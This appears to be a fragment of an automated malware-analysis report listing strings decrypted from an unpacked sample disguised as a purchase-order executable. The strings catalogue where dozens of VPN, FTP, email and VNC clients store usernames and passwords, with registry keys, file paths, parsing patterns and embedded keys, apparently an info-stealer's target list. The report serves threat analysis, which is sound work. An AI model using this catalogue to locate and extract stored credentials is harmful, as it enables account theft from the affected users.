                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: DynDns
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: username=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: password=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: t6KzXhCh
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: global
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: accounts
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: account.
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: username
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: account.
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: name
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: APPDATA
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Psi\profiles
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: APPDATA
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: OpenVPN
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: username
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: auth-data
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: entropy
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: USERPROFILE
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: remote
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: remote
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: NordVPN
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: NordVPN
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: user.config
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: NordVPN
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \account.json
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FileZilla
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: APPDATA
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: APPDATA
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Server>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Host>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Host>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </Host>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Port>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </Port>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <User>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <User>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </User>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </Pass>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Pass>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </Pass>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: CoreFTP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: User
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Host
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Port
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: WinSCP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HostName
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UserName
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PublicKeyFile
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PortNumber
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: WinSCP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ABCDEF
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Flash FXP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: port
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: user
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pass
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: quick.dat
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Sites.dat
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FTP Navigator
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: No Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: User
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SmartFTP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: APPDATA
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: WS_FTP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: appdata
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HOST
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PWD=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PWD=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FtpCommander
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;Password=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;User=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;Server=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;Port=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;Port=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;Password=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;User=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ;Anonymous=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </server_ip>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_port>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </server_port>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </server_user_name>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: </server_user_password>
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: The Bat!
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: appdata
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \The Bat!
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Becky!
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: DataDir
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Folder.lst
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Account
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PassWd
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Account
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SMTPServer
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Account
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: MailAddress
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Becky!
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Outlook
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Windows Mail App
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SchemaId
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: syncpassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: mailoutgoing
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FoxMail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Executable
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: FoxmailPath
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Storage\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Storage\
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: POP3Host
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SMTPHost
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: IncomingServer
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Account
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: MailAddress
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: POP3Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Opera Mail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: opera:
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PocoMail
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: appdata
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: POPPass
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SMTPPass
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SMTP
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: eM Client
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: eM Client
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Accounts
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: "Username":"
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: "Secret":"
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: "ProviderName":"
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Mailbird
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SenderIdentities
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Accounts
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Server_Host
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Accounts
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Email
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Username
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: EncryptedPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Mailbird
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: TightVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: TightVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ControlPassword
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: TigerVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: Password
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd2
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles
